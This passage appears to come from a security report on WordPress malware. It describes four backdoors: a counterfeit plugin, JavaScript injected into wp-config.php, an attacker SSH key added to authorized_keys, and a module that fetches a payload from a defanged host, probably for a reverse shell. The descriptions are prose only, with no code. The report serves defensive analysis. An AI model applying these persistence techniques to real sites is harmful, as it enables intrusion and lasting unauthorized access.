The malicious software comprises four distinct backdoors:

The presence of four backdoors enables the attackers to have several avenues of re-entry in case one is detected and eliminated. This is a unique occurrence we’ve not encountered previously. It also introduces an additional type of assault made feasible by exploiting websites that fail to monitor third-party dependencies within the users’ browsers.

The four backdoors:

The functionalities of the four backdoors are detailed below:

• Backdoor 1, which uploads and installs a counterfeit plugin named “Ultra SEO Processor,” subsequently used to carry out commands issued by the attacker.
• Backdoor 2, which injects harmful JavaScript into wp-config.php.
• Backdoor 3, which places an attacker-controlled SSH key into the ~/.ssh/authorized_keys file to enable continuous remote access to the system.
• Backdoor 4, which is intended to execute commands remotely and retrieves another payload from gsocket[.]io, likely to initiate a reverse shell.